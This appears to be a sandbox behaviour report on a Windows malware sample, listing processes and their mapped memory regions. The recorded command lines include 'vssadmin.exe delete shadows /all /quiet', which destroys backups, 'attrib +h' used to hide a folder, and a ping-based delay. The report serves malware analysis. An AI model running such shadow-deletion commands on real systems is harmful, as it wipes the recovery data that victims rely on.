mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24753 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24754 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 24755 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24756 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 438 os_tid = 0xc30 Process: id = "325" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16dc0" os_pid = "0xc64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "321" os_parent_pid = "0xb9c" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24793 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24794 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24795 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24796 start_va 
= 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 24797 start_va = 0x970000 end_va = 0x976fff entry_point = 0x970000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 24798 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24799 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24800 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24801 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 24802 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24803 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24804 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24805 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24806 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 24807 start_va = 0x5b0000 end_va = 0x5bffff 
entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 24808 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 24809 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24810 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24811 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24812 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24813 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24814 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24815 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24816 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 
0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24817 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24818 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24819 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24820 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 24821 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24822 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 439 os_tid = 0xc20 Process: id = "326" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x7ea16c00" os_pid = "0xc24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "322" os_parent_pid = "0xb68" cmd_line = "vssadmin.exe delete shadows /all /quiet " cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 
AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24840 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24841 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24842 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24843 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 24844 start_va = 0x960000 end_va = 0x97efff entry_point = 0x960000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 24845 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24846 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24847 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24848 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 24849 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24907 start_va = 0x10000 
end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24908 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24909 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24910 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 24911 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 24912 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 24913 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 24914 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 24915 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24916 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24917 start_va = 0x76480000 end_va = 0x76489fff entry_point 
= 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24918 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 24919 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24920 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24921 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24922 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24923 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 24924 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24925 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24926 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24927 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24928 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 24929 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24930 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24991 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24992 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 24993 start_va = 0xe0000 end_va = 0xecfff entry_point = 0xe0000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 24994 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 24995 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 24996 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 24997 
start_va = 0x980000 end_va = 0x157ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 24998 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 25002 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 25003 start_va = 0x670000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 25004 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 25005 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25006 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 25007 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 25008 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 25009 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 25010 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 25011 start_va = 
0x1580000 end_va = 0x184efff entry_point = 0x1580000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 25012 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 25217 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 25218 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 25219 start_va = 0x6e440000 end_va = 0x6e449fff entry_point = 0x6e440000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 25220 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 25221 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 440 os_tid = 0xc90 Thread: id = 448 os_tid = 0x63c Thread: id = 449 os_tid = 0x8d4 Thread: id = 451 os_tid = 0xc88 Thread: id = 452 os_tid = 0xb94 Process: id = "327" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16ce0" os_pid = "0xca4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "ping -n 10 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE 
LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24850 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24851 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24852 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24853 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 24854 start_va = 0x1a0000 end_va = 0x1a7fff entry_point = 0x1a0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 24855 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24856 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24857 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24858 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24859 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24860 start_va = 0x10000 
end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24861 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24862 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24863 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 24864 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24865 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 24866 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 24867 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24868 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24869 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 24870 start_va = 0x76480000 end_va = 0x76489fff entry_point 
= 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24871 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24872 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24873 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24874 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24875 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24876 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 24877 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24878 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24879 start_va = 
0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24880 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 24881 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24882 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24883 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 24884 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 24885 start_va = 0x70000 end_va = 0x72fff entry_point = 0x70000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 24886 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 24887 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 24888 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 24889 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 24890 start_va = 0x1180000 end_va = 0x144efff entry_point = 0x1180000 region_type = mapped_file name 
= "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 24891 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 24892 start_va = 0x1450000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 24893 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 24904 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 24905 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 24906 start_va = 0x15a0000 end_va = 0x16cffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 24931 start_va = 0x14f0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 24932 start_va = 0x1560000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 24933 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 24934 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" 
